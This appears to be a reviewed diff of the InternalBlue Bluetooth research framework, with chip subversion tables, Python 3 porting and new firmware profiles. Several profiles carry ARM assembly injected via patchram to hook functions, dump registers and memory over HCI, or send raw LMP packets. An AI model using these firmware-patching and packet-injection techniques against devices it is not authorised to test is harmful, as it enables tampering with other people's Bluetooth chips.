0x000f | 0x08 | 0x220b | BCM20707 | Fitbit Ionic
0x000f | 0x08 | 0x2230 | BCM20703A2 | MacBook Pro 2016 (A1707) | Oct 22 2015
0x000f | 0x08 | 0x2246 | BCM20703A2 | MacBook Pro 2016
0x000f | 0x08 | 0x2247 | BCM20703A2 | MacBook Pro 2016 (with security fix)
0x000f | 0x08 | 0x224b | BCM20703A2 | MacBook Pro 2016, 2017
0x000f | 0x08 | 0x2246 | BCM20703A2 | MacBook Pro 2016 | Oct 22 2015
0x000f | 0x08 | 0x2247 | BCM20703A2 | MacBook Pro 2016 (with security fix) | Oct 22 2015
0x000f | 0x08 | 0x224b | BCM20703A2 | MacBook Pro 2016, 2017, iMac 2017 Retina 5k | Oct 22 2015
0x000f | 0x08 | 0x224c | BCM20703A2 | MacBook Pro 15" 2017 (A1707) | Oct 22 2015
0x000f | 0x08 | 0x240f | BCM4358A3 | Nexus 6P, Samsung Galaxy S6, Samsung Galaxy S6 edge | Oct 23 2014
0x000f | 0x08 | 0x4109 | BCM4345 | iPhone 6
0x000f | 0x08 | 0x4109 | BCM4345B0 | iPhone 6 (Tempranillo) | Jul 15 2013
0x000f | 0x08 | 0x430a | | iPad Pro 2016 (MLMW2FD/A)
0x000f | 0x08 | 0x6103 | BCM4355C0 | iPhone 7 (A1778) | Sep 14 2015
0x000f | 0x08 | 0x6106 | | Samsung Galaxy S7
0x000f | 0x08 | 0x617e | BCM4350 | MacBook Pro 2017 (Retina 12"), MacBook Pro (13", 2016)
0x000f | 0x08 | 0x6206 | | iPhone SE
0x000f | 0x08 | 0x6103 | BCM4355C0 | iPhone 7 A1778 (Elsa) | Sep 14 2015
0x000f | 0x08 | 0x6106 | | Samsung Galaxy S7, Huawei P20
0x000f | 0x08 | 0x617e | BCM4350 | MacBook Pro 2017 (Retina 12", 13"), MacBook Pro (13", 2016) | May 28 2013
0x000f | 0x08 | 0x6119 | BCM4345C0 | Raspberry Pi 3+, Honor 8, Xperia X | Aug 19 2014
0x000f | 0x08 | 0x6206 | BCM4345C1 | iPhone SE (Hans), iPod Touch 7th Generation (MVJ72FD/A) | Jan 27 2015
0x000f | 0x09 | 0x102f | BCM4355 | MacBook Air 2019 13" Retina | Mar 7 2017
0x000f | 0x09 | 0x112e | BCM4364B0 | iMac Retina 4K 21.5"/27" 2019 macOS Mojave 10.14.6 | Aug 21 2015
0x000f | 0x09 | 0x112f | BCM4364B0 | MacBook Pro 2019 13" 4x Thunderbold | Aug 21 2015
0x000f | 0x09 | 0x103f | BCM4364 | iMac Pro 2017
0x000f | 0x09 | 0x2023 | BCM4377B3 | MacBook Pro 2019 13" 2x Thunderbold (Formosa) | Feb 28 2018
0x000f | 0x09 | 0x203f | BCM4364 | MacBook Pro (13", 2018)
0x000f | 0x09 | 0x2040 | | Apple Watch Series 3
0x0131 | 0x09 | 0x4208 | CYW20819A1 | ULP BLE/BR/EDR Bluetooth 5 Wireless MCU Evaluation Kit CYW920819EVB-02 | May 22 2018
0x000f | 0x09 | 0x2043 | BCM4346B0 | MacBook Pro 2019 15"
0x0131 | 0x09 | 0x220c | CYW20819A1 | ULP BLE/BR/EDR Bluetooth 5 Wireless MCU Evaluation Kit CYW920819EVB-02 | May 22 2018
0x000f | 0x09 | 0x411a | BCM4347B0 (BCM4361B0) | Samsung Galaxy S8 | Jun 3 2016
0x0131 | 0x09 | 0x4208 | CYW20735B1 | BLE/BR Bluetooth 5.0 Evaluation Kit CYW920735Q60EVB-01 | Jan 18 2018
0x000f | 0x09 | 0x4208 | BCM4375B1 | Samsung Galaxy S10e, Samsung Galaxy S10, Samsung Galaxy S10+ (local version is 0x1111) | April 13 2018
0x000f | 0x09 | 0x420e | | iPhone XR, iPhone X
0x000f | 0x09 | 0x4208 | BCM4375B1 | Samsung Galaxy S10e, Samsung Galaxy S10, Samsung Galaxy S10+, Samsung Galaxy Note 10/10+ (local version is 0x1111) | April 13 2018
0x000f | 0x09 | 0x420e | BCM4347B1 | iPhone 8, XR, X | Oct 11 2016
0x0131 | 0x09 | 0x420e | CYW20739B1 | Bluetooth 5.0 BLE Evaluation Kit CYW920719Q40EVB-01 | Jan 17 2017
0x000f | 0x09 | 0x4307 | | iPhone XS, iPhone Xs Max
0x000f | 0x09 | 0x4309 | | Samsung Galaxy Note 9, Samsung Galaxy S9+
0x0131 | 0x09 | 0x6119 | BCM4345C0 | Raspberry Pi 4 with Bluetooth 5 patches, same ROM as 3+ | Aug 19 2014
0x000f | 0x09 | 0x4307 | BCM4377B2 | iPhone XS (Aladdin), iPhone Xs Max (Genie), iPad Pro 11" 3E149FD/A, iPad Pro 11" 3E148FD/A, iPad Pro 12.9" 3rd gen 3D941FD/A, iPad mini 5th gen 3F559FD/A, iPad Air 3rd gen 3F561FD/A
0x000f | 0x09 | 0x4309 | | Samsung Galaxy Note 9, Samsung Galaxy S9, S9+
0x0131 | 0x09 | 0x6119 | BCM4345C0 | Raspberry Pi 3+/4 --- *with Bluetooth 5 patches, same ROM as 3+* | Aug 19 2014
0x000f | 0x09 | 0x6214 | BCM4355C1 | iPad 6th gen 3D575FD/A, iPad 6th gen MRJN2FD/A, iPad 6th gen MR7J2FD/A A1893 (FigaroA)
0x000f | 0x0a | 0x4228 | BCM4378B1 | iPhone 11 (Hei), iPhone 11 Pro (Moana), iPhone 11 Pro Max (Tala) --- *announce BT 5.1 over the air despite being specified as BT 5 online*
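Review bot: spelling and consistency in the table rows: 'Thunderbold' in the two MacBook Pro 2019 rows should be 'Thunderbolt', 'ultimo 2014' should be 'late 2014', and the build dates mix formats ('April 13 2018' versus 'Aug 19 2014'). The same LMP subversion now appears with different chips (0x4208 as CYW20735B1 under vendor 0x0131 and BCM4375B1 under 0x000f; 0x420e as CYW20739B1 and BCM4347B1), and Raspberry Pi 3+ is listed both under 0x000f/0x6119 and in the 0x0131/0x6119 row that now says '3+/4'; a sentence above the table stating that the Vendor column is needed to disambiguate would match the `iOS` special case added to fw.py in this change.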
@@ -73,6 +89,7 @@ There is a couple of issues causing trouble running *InternalBlue*, which are re
* CYW20735B1
* `Launch_RAM` works in principle, but threading seems to be broken if the executed code generates other HCI events.
A hook at `0xB0316` is a nice spot to implement a function that generates HCI events and can be called via the HCI command `0xfc19`.
The general solution seems to be `self.internalblue.patchRom(0x3d32e, "\x70\x47\x70\x47")` respectively `patch -a 0x3d32e --asm bx lr`, which fixes that the baud rate is set to a wrong value during `Launch_RAM`.
Firmware Version and Build Date
-------------------------------
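Review bot: `self.internalblue.patchRom(0x3d32e, "\x70\x47\x70\x47")` in the CYW20735B1 notes passes the patch as a `str` literal; after the Python 3 conversion in this change the documented call should be `b"\x70\x47\x70\x47"`. Wording: 'respectively' here should be 'or' ('..., or `patch -a 0x3d32e --asm bx lr`, ...').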
@@ -84,62 +101,6 @@ On newer chips, the build information is located in the beginning of the stack.
hd 0x200400
Firmware Related Setup
----------------------
The following steps are required to use the CYW20735B1 evaluation kit as normal HCI device on Linux with BlueZ.
**1. Setup as HCI device**
You need to set the baud rate to 3 Mbit/s. Replace `/dev/ttyUSB0` with your device.
btattach -B /dev/ttyUSB0 -S 3000000
If this does not work directly, use:
stty -F /dev/ttyUSB0 3000000
btattach -B /dev/ttyUSB0
**2. Use with BlueZ**
Assuming that you already have a regular Bluetooth device, you new device is `hci1`.
hciconfig hci1 up
You can list your HCI devices:
hcitool dev
**3. Command line tools for connections**
Scanning for devices:
hcitool scan
hcitool lescan
Connections and pairing:
bluetoothctl
Enter into `bluetoothctl` command prompt:
power on
agent on
default-agent
scan on
Optional - accept connections:
advertise on
pairable on
discoverable on
Do a pairing and then connect:
pair aa:bb:cc:dd:ee:ff
connect aa:bb:cc:dd:ee:ff
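Review bot: this hunk drops the whole 'Firmware Related Setup' section (btattach/stty, hciconfig and bluetoothctl steps for the CYW20735B1 kit) without saying where it went. If the content moved to another document, leave a one-line pointer under 'Firmware Version and Build Date'; if it was removed on purpose, the CYW20735B1 entry in the issues list above still implies the kit is supported and users will look for these steps.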
+13 -5
View File
@@ -23,11 +23,13 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from builtins import hex
from builtins import object
from pwn import log
class Firmware:
def __init__(self, version=None):
class Firmware(object):
def __init__(self, version=None, iOS=False):
"""
Load and initialize the actual firmware add-ons for Nexus 5, Raspi3, etc.
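Review bot: the new `iOS=False` parameter of `Firmware.__init__` is not documented in the docstring right below it ('Load and initialize the actual firmware add-ons ...'); add a line saying it selects the `_iphone` firmware module when an LMP subversion is shared with a non-Apple chip. Minor: `from builtins import hex` / `from builtins import object` come from the `future` backport on Python 2, so make sure `future` is declared as a dependency.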
@@ -41,9 +43,15 @@ class Firmware:
# get LMP Subversion
log.info("Chip identifier: 0x%04x (%03d.%03d.%03d)" %
(version, version >> 13, (version & 0xf00) >> 8, version & 0xff))
try:
self.firmware = __import__(__name__ + '_' + hex(version), fromlist=[''])
log.info("Using fw_" + hex(version) + ".py")
# Fix for duplicate version number of evaluation board / iPhones
if iOS and version==0x420e:
self.firmware = __import__(__name__ + '_' + hex(version) + '_iphone', fromlist=[''])
log.info("Using fw_" + hex(version) + "_iphone.py")
else:
self.firmware = __import__(__name__ + '_' + hex(version), fromlist=[''])
log.info("Using fw_" + hex(version) + ".py")
except ImportError:
self.firmware = None
pass
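Review bot: `if iOS and version==0x420e:` hard-codes a single colliding subversion, while the README table in this change already lists another collision (0x4208 is both CYW20735B1 and BCM4375B1); a generic rule is more robust: when `iOS` is set, try `__name__ + '_' + hex(version) + '_iphone'` first and fall back to the plain module name. Also, `except ImportError:` around `__import__` swallows an `ImportError` raised inside the firmware module itself (for example its `from .fw import MemorySection`), which then looks like 'unknown firmware'; log the exception or distinguish the missing-module case. The `pass` after `self.firmware = None` is redundant.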
@@ -54,7 +62,7 @@ class Firmware:
log.info("Loaded firmware information for " + self.firmware.FW_NAME + ".")
class MemorySection:
class MemorySection(object):
"""
All firmwares have memory sections that can be RAM, ROM or neither of both.
"""
+158
View File
@@ -0,0 +1,158 @@
from __future__ import absolute_import
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# Samsung S10/S10e/S10+
FW_NAME = "BCM4375B1"
# Device Infos
DEVICE_NAME = 0x207f2a
BD_ADDR = 0x2026e2
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x0013ffff, True, False), # Internal ROM
MemorySection(0x00160000, 0x0017ffff, False, True), # Patches
MemorySection(0x00200000, 0x00288000, False, True), # Internal Memory Cortex M3
MemorySection(0x00300000, 0x0037ffff, False, True),
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x160000
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
BLOC_HEAD = 0x20075c
BLOC_NG = True
# Assembler snippet for tracepoints
# In contrast to the Nexus 5 patch, we uninstall ourselves automatically and use internal debug functions
# TODO S10e does no longer have a patch uninstall function... writemem works to remove patches, but copying
# Assembly of the original function from an eval board does not work...
#TRACEPOINT_BODY_ASM_LOCATION = 0x00218300
#TRACEPOINT_HOOKS_LOCATION = 0x00218500
#TRACEPOINT_HOOK_SIZE = 40
TRACEPOINT_HOOK_ASM = """
push {r0-r12, lr} // save all registers on the stack (except sp and pc)
ldr r6, =0x%x // addTracepoint() injects pc of original tracepoint here
mov r9, %d // addTracepoint() injects the patchram slot of the hook patch
bl 0x%x // addTracepoint() injects TRACEPOINT_BODY_ASM_LOCATION here
pop {r0-r12, lr} // restore registers
// branch back to the original instruction
b 0x%x // addTracepoint() injects the address of the tracepoint
"""
TRACEPOINT_BODY_ASM_SNIPPET = """
mov r8, lr // save link register in r8
b delete_slot
// dump registers like before
// save status register in r5
mrs r5, cpsr
// malloc HCI event buffer
mov r0, 0xff // event code is 0xff (vendor specific HCI Event)
mov r1, 76 // buffer size: size of registers (68 bytes) + type and length + 'TRACE_'
bl 0x6cfe2 // hci_allocateEventBlockWithLen(0xff, 78) #DONE
mov r4, r0 // save pointer to the buffer in r4
// append our custom header (the word 'TRACE_') after the event code and event length field
add r0, 2 // write after the length field
ldr r1, =0x43415254 // 'TRAC'
str r1, [r0]
add r0, 4 // advance the pointer.
ldr r1, =0x5f45 // 'E_'
strh r1, [r0]
add r0, 2 // advance the pointer. r0 now points to the start of the register values
// store pc
str r6, [r0] // r6 still contains the address of the original pc
add r0, 4 // advance the pointer.
// store sp
mov r1, 56 // 14 saved registers * 4
add r1, sp
str r1, [r0]
add r0, 4 // advance the pointer.
// store status register
str r5, [r0]
add r0, 4 // advance the pointer.
// store other registers
mov r1, sp
mov r2, 56
bl 0x2774 // memcpy(dst, src, len) #DONE
// send HCI buffer to the host
mov r0, r4 // r4 still points to the beginning of the HCI buffer
bl 0x6cfa8 // hci_sendEvent #DONE
// restore status register
msr cpsr_f, r5
bl 0x6af24 // bthci_event_vs_DBFW_CoreDumpRAMImageEvent #DONE
// not possible... could not find patch_uninstallPatchEntry(slot)
// -> disable TP by hand, we stored in r9
// TODO - does not work??
delete_slot:
mov r0, #0
mov r1, r0
lsl r0, r0, #0x2
ldr r3, =0x00310404
sub.w r0, r0, #0x400
add r3, #0x3c
add r0, r3
movw r2, #0xffff
str r2, [r0, #0x0]
ldr r0,=0x00310404
add r0, #0x2c
ldr r2, [r0,#0x0]
mov r3, #0x1
lsl r3, r1
bic r2, r3
str r2, [r0, #0x0]
mov lr, r8 // restore lr from r8
bx lr // return
.align
patchram:
.byte 0x04
.byte 0x04
.byte 0x31
.byte 0x00
"""
+99
View File
@@ -0,0 +1,99 @@
#!/usr/bin/env python2
# fw_0x6119.py
#
# All firmware specific data such as address offsets are collected
# in the fw.py file. Later versions of the framework will provide
# multiple copies of this file in order to target different firmware
# and chip versions.
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
# Firmware Infos
# This runs on Rasperry Pi 3
from builtins import object
FW_NAME = "BCM43430A1"
# Device Infos
DEVICE_NAME = 0x20401C
BD_ADDR = 0x201C64
# Memory Sections
class MemorySection(object):
def __init__(self, start_addr, end_addr, is_rom, is_ram):
self.start_addr = start_addr
self.end_addr = end_addr
self.is_rom = is_rom
self.is_ram = is_ram
def size(self):
return self.end_addr - self.start_addr
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x0, 0x90000, True , False),
MemorySection(0xd0000, 0xd8000, False, True ),
#MemorySection(0xe0000, 0x1f0000, True , False),
MemorySection(0x200000, 0x21ffff, False, True ),
#MemorySection(0x260000, 0x268000, True , False), # might crash? issue 14
#MemorySection(0x280000, 0x2a0000, True , False),
MemorySection(0x318000, 0x320000, False, False),
MemorySection(0x324000, 0x360000, False, False),
MemorySection(0x362000, 0x362100, False, False),
MemorySection(0x363000, 0x363100, False, False),
MemorySection(0x600000, 0x600800, False, False),
MemorySection(0x640000, 0x640800, False, False),
MemorySection(0x650000, 0x650800, False, False),
#MemorySection(0x680000, 0x800000, False, False)
]
# Connection Structure and Table
#CONNECTION_LIST_ADDRESS = 0x204ba8
CONNECTION_MAX = 11
CONNECTION_STRUCT_LENGTH = 0x150 # TODO
# Patchram
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = False
# Heap
BLOC_HEAD = 0x200588 # g_dynamic_memory_GeneralUsePools
BLOC_NG = True # Next Generation Bloc Buffer
# Snippet for sendLcpPacket()
SENDLCP_CODE_BASE_ADDRESS = 0x21a000
SENDLCP_ASM_CODE = """
push {r4,lr}
// we want to call lmulp_sendLcp(conn_index, input, length)
mov r0, %d // connection index, starts at 0
ldr r1, =payload
mov r2, %d // length
bl 0x8389A // lmulp_sendLcp
pop {r4,pc} // go back
.align // The payload (LMP packet) must be 4-byte aligend (memcpy needs aligned addresses)
payload: // Note: the payload will be appended here by the sendLmpPacket() function
"""
+46
View File
@@ -0,0 +1,46 @@
from __future__ import absolute_import
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW20706
FW_NAME = "CYW20706"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c7fff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True ),
MemorySection(0x00200000, 0x00247fff, False, True), # Internal Memory Cortex M3
]
# Patchram
#PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
#PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
#PATCHRAM_VALUE_TABLE_ADDRESS = 0x0d0000
#PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = True
# only seems to work 4-byte aligned here ...
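Review bot: with all four `PATCHRAM_*` address constants commented out, `PATCHRAM_ALIGNED = True` has nothing to apply to, and any feature that checks for `PATCHRAM_TARGET_TABLE_ADDRESS` in `dir(self.fw)` will report the CYW20706 as unsupported; either restore the addresses once verified or drop `PATCHRAM_ALIGNED` and leave a comment that patchram is unverified on this chip. The header `# fw_0x420e.py` / 'Generic firmware file in case we do not know something...' is copied from another file and should name this one (CYW20706, subversion 0x220b per the README table).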
+3 -2
View File
@@ -1,3 +1,4 @@
from __future__ import absolute_import
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
@@ -20,11 +21,11 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW920819
FW_NAME = "CYW20819"
FW_NAME = "CYW20819A1"
# Memory Sections
+2 -1
View File
@@ -23,7 +23,8 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from __future__ import absolute_import
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM20702A1 (USB Bluetooth dongle)"
+2 -1
View File
@@ -22,7 +22,8 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from __future__ import absolute_import
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM20703A2 (MacBook Pro 2016)"
+2 -1
View File
@@ -25,7 +25,8 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from __future__ import absolute_import
from .fw import MemorySection
# Firmware Infos
# This runs on Nexus 6P, Samsung Galaxy S6, Samsung Galaxy S6 edge
+83
View File
@@ -0,0 +1,83 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone 6
FW_NAME = "BCM4345B0"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c07ff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200400, 0x00201cff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000 # needs to be aligned read
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = True
# Assembler snippet for the readMemAligned() function
READ_MEM_ALIGNED_ASM_LOCATION = 0x215000 # there is nothing free until 0xdffff, but 0x215000 looks okay during runtime
READ_MEM_ALIGNED_ASM_SNIPPET = """
push {r4, lr}
// malloc HCI event buffer
mov r0, 0xff // event code is 0xff (vendor specific HCI Event)
mov r1, %d // readMemAligned() injects the number of bytes it wants to read here
add r1, 6 // + type and length + 'READ'
bl 0x15DD4 // hci_sendEvent (will automatically copy event code and length into the buffer)
mov r4, r0 // save pointer to the buffer in r4
// append our custom header (the word 'READ') after the event code and event length field
add r0, 2 // write after the length field
ldr r1, =0x44414552 // 'READ'
str r1, [r0]
add r0, 4 // advance the pointer. r0 now points to the beginning of our read data
// copy data to buffer
ldr r1, =0x%x // readMemAligned() injects the read_address here. r1 will be used as src pointer in the loop
mov r2, %d // readMemAligned() injects the number of dwords to read here. r2 will be the loop counter
loop:
ldr r3, [r1] // read 4 bytes from the read_address
str r3, [r0] // store them inside the HCI buffer
add r0, 4 // advance the buffer pointer
add r1, 4 // advance the read_address
subs r2, 1 // decrement the loop variable
bne loop // branch if r2 is not zero yet
// send HCI buffer to the host
mov r0, r4 // r4 still points to the beginning of the HCI buffer
bl 0x573B8 // send_hci_event_without_free()
// free HCI buffer
mov r0, r4
bl 0x581AE // osapi_blockPoolFree
pop {r4, pc} // return
"""
+47
View File
@@ -0,0 +1,47 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# Samsung Galaxy S8
FW_NAME = "BCM4347B0"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x00100000, True, False), # Internal ROM
MemorySection(0x00130000, 0x00150000, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200000, 0x0023ffff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x130000
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
# Heap
BLOC_HEAD = 0x20067C # g_dynamic_memory_GeneralUsePools
BLOC_NG = True # Next Generation Bloc Buffer
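Review bot: the header comment (`# fw_0x420e.py`, "Generic firmware file in case we do not know something...") is a template and does not describe this file, which is the Samsung Galaxy S8 BCM4347B0 profile; two other new files on this page (BCM4347B1 and BCM4345C1) carry the identical header, so each should get its real file name and a one-line description. The MemorySection end addresses also mix conventions: `0x00100000` and `0x00150000` read as exclusive ends, while `0x0023ffff` and every other profile give an inclusive last address; pick one so code that iterates start..end does not read one byte past the ROM.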
+41
@@ -0,0 +1,41 @@
#!/usr/bin/env python2
#
# fw_0x220e.py
#
# Firmware file for BCM20702A1 chipsets. These chipsets are typically used for
# Bluetooth USB dongles.
#
# Copyright (c) 2019 Jan Ruge and Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM20702A2"
# Device Infos
#DEVICE_NAME = 0x280CD0 # rm_deviceLocalName, FIXME has no longer a length byte prepended
#BD_ADDR = 0x280CA4 # rm_deviceBDAddr
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x5ffff, True, False), # Internal ROM
MemorySection(0x80000, 0x9bfff, False, True), # Internal RAM
]
BLOC_HEAD = 0x3166c
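Review bot: the header comment says this is the firmware file for BCM20702A1 while `FW_NAME = "BCM20702A2"`; one of the two is wrong, and since FW_NAME is what users see it should match the chip the addresses were taken from. The `#!/usr/bin/env python2` shebang on a new, import-only module in a Python 3 compatibility change is misleading and should go. This profile also defines no PATCHRAM_* constants; if fw.py has defaults for that case, fine, otherwise a comment saying that patching is unsupported on this chip would save the next reader a traceback.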
+3 -3
@@ -20,11 +20,11 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW927035
FW_NAME = "CYW27035B1"
# Evaluation Kit CYW920735
FW_NAME = "CYW20735B1"
# Device Infos
DEVICE_NAME = 0x280CD0 # rm_deviceLocalName, FIXME has no longer a length byte prepended
+79 -4
@@ -20,11 +20,12 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW927019
FW_NAME = "CYW27039B1"
# Evaluation Kit CYW920719
FW_NAME = "CYW20739B1 (NOT iPhone X/XR!)"
# TODO this is not the iPhone firmware, we need to add a switch in fw.py
# Device Infos
DEVICE_NAME = 0x280CD0 # rm_deviceLocalName, FIXME has no longer a length byte prepended
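Review bot: `FW_NAME = "CYW20739B1 (NOT iPhone X/XR!)"` turns a display name into a warning, and the TODO on the next line already says the real fix is a switch in fw.py; a short comment on why this profile collides with the iPhone X/XR firmware would help, and the warning itself belongs in a log message at the point where the profile is selected rather than in FW_NAME.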
@@ -46,8 +47,82 @@ SECTIONS = [ MemorySection(0x00000000, 0x001fffff, True, False), # Internal R
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x270000
PATCHRAM_NUMBER_OF_SLOTS = 192
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
# only seems to work 4-byte aligned here ...
# Assembler snippet for tracepoints
# In contrast to the Nexus 5 patch, we uninstall ourselves automatically and use internal debug functions
TRACEPOINT_BODY_ASM_LOCATION = 0x00223100
TRACEPOINT_HOOKS_LOCATION = 0x00223200
TRACEPOINT_HOOK_SIZE = 40
TRACEPOINT_HOOK_ASM = """
push {r0-r12, lr} // save all registers on the stack (except sp and pc)
ldr r6, =0x%x // addTracepoint() injects pc of original tracepoint here
mov r0, %d // addTracepoint() injects the patchram slot of the hook patch
bl 0x34964 // patch_uninstallPatchEntry(slot)
bl 0x%x // addTracepoint() injects TRACEPOINT_BODY_ASM_LOCATION here
pop {r0-r12, lr} // restore registers
// branch back to the original instruction
b 0x%x // addTracepoint() injects the address of the tracepoint
"""
TRACEPOINT_BODY_ASM_SNIPPET = """
mov r8, lr // save link register in r8
// dump registers like before
// save status register in r5
mrs r5, cpsr
// malloc HCI event buffer
mov r0, 0xff // event code is 0xff (vendor specific HCI Event)
